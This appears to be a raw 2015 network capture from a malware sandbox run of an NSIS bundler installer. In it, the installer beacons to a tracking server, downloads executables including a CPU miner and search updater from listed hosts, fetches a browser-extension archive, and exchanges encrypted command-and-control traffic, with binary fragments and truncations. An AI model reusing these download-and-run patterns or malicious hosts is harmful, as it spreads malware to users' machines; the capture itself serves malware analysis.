Content-Length: 460
Connection: Keep-Alive
Cache-Control: no-cache
cnt=6579010c2b8757be5b4951de6578f753&_srvlog=NSI &browser=un&capp=nsdummy&cid=12216¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=D6A6947B24975DB6AB9DE8B171C5FA6E&sysid1=D6A6947B24975DB6AB9DE8B171C5FA6E&te=1443221170&ts=1443221169&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempst25.tmp /ci 12216&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 25 Sep 2015 22:46:09 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /setup_362.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: special-bundles.s3-website-us-east-1.amazonaws.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vVxWZJdxxdgnQT708B9JU /SW1Q8fRusemKLJfLzEe5A4acvTkgRWcjTgq7awO0M
x-amz-request-id: 996B60BC172F4DF4
Date: Fri, 25 Sep 2015 22:46:35 GMT
Last-Modified: Wed, 10 Jun 2015 05:41:11 GMT
ETag: "0ccf900044e0e4edf36e89008e2c6aa7"
Content-Type: application/octet-stream
Content-Length: 254464
Server: AmazonS3
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R...R...R.......R....5..R....4..R...*...R...R...R....1..R.......R.......R..Rich.R..................PE..L...|.wU.................(...........4.......@....@..........................0............@.................................<...P....................................B...............................v..@............@...............................text...\&.......(.................. ..`.rdata..&m...@...n...,..............@..@.data....4..........................@....rsrc...............................@..@.reloc...'.......(..................@..B...........................................................................................................................................................................................................................................................................................................................................................BB...........U..V.....BB..o....E..t.V.E........^]............V..W...r...$......;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. ...._...^._3.^................U..j.hI.B.d.....P..,...B.3..E.SVWP.E.d.......3..]....G.3..F......^..u..}..E.f...]..E.....;.......3..U............u..U..G..M....r.......f.<.=.........r.........4.V.a........u... t.../..........r........M.f...f.T].C....M....ux3...D}.Ph..B.3..|...f.D}.G...|..M..E.............E.f.U................E.........f.U.f.E.3.
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:00 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:00 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:00 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:01 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:01 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:22 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:22 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:24 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:24 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:34 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:35 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:35 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:45 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:45 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:46 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:46 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:57 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:57 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:57 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:45:57 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:07 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:07 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:08 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:08 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 200
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:18 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:18 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:23 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:23 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:33 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:33 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:35 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 22:46:35 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:33 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=D825CDAEEB1043FA9CB4972941EB3F13; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=D825CDAEEB1043FA9CB4972941EB3F13,1443221193.18008; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:25 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40678
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop005.fr7.t,1443221125.cds005.fr7.c
......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c
<<< skipped >>>
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 58628829
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: gmsd_re_005010096-gmsd_re_005010096
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 410
Cache-Control: no-cache
ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcsAaJIoxT54jOVrSF2+RX+r1ugkxX7buaKejfG1TigRcOM3yZsClNi6+RKQstPciC/856Qj+eW+2Ds/sNwgcHbBKQANmibrCwNctwli+4ICTc6ZT3YwpgdIfRwxf6SzzeH0ateAcYrqZZwH326OEHCeX5+J9UNFEMcNZU3jp5k9OHX+TR2f/04GM7fBuW9pzdyhJ+VnKlTo0gQiRYOeOCpF+fxP5w7qNMj+Cr4wnm/+cGOC0q1YAqLMyKzUA1+1TrKD1JSXiQ8EwOOFpKUddyWofCFCrpqOi31i0rkElNrjIR078Y3K1zexTVlkVN/ROvACVpowMuswPw=
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:30 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 26780
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1443221190; expires=Wed, 19 Jan 16 16:33:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443221190052851; path=/; expires=Sun, 25-Oct-15 22:46:30 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
8b8c..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pEI4yS2Vf5K1CwWkZ8xeq2FoHZiTq7fWERGyCAg88jpdmzVknJJbtdhSvgVLNEQZKmNKxPN3kfibTew3 ynOvjDhwwNX4fU19cLBEHf1q/Xj32GKoBkNDpFEvQc2RNtJ53wo0SzNY73Ov0OwqXrzI2YO2u8inUw0vzCREN1FLQCs72ck1KAXe9yjrUUOMG3q5g bq2QQatEZu6ZjmuvlhS8NPfmulr0/r2gbViyCGlmkK/Y6mz2jnp34PELZGdX7a7/3FbxPxvDNhkdb2Ix8lFg6G8IJZHOjZBpEqhB7EYYTy1F75DDgWmwZzwXaREMRyjejxsSQDFoLX2kKbPihkQX5Y8y/CXBDdrjNus0WjUra9Pa/zcgrEm7r94 DftChsiNYB6fppCwX o2v3MzwAVKVbyAKvLwDjcfvM40Nt4UCFp87iFCkirNyiyShQlgtRKr1IN77JviR6fBknbCopnu2k6lPjxOC0iHsH1OrICiia45/QGOnrbsotWXdARfOwlu6zXcRntUj3M hIOVgq84xcs/ct6zaSPa9zw1oXlKxbmdoft 4h/a3In6PaWHY15E0lbJ8vXHv400B7ycSX69szZkEQFt/edKmVJtx83bm8TavyR8hf5oa15R9hPQoPALN8GTJXbhLXmUqwzg9sZ6nCLvjPwC8AEp8MDaooPo7OTuM4eTHjVzEEIWQTVnsOws1pQWaYspJA1kAflC8CQhpM0meg4DhBwimdTQYxyOO67jyKrx2aNiolCAKmKCvmkmNpi6Hthz7xKH/vkPNR7EtpKtlu1HZkDN L/GVShTNTIxIlq3YG1CtI1Kgk EwGn7VH/AwzagZPU3ETblI rYGR40LGwWP0EHuXl/k/Qw FnR9tVwNDE3Rm4rnBJdBaJpc09i7ShzMJeQ/XoMQJNAHm1mzJ3dgy9DawCIgLEHXiWY24jHO76uvlkGnx9J8rO618yxrSRrqOdyZCGHJviVRLa3llCHtIYnav/nW76CDuDZ99Cm6ZKUqazI 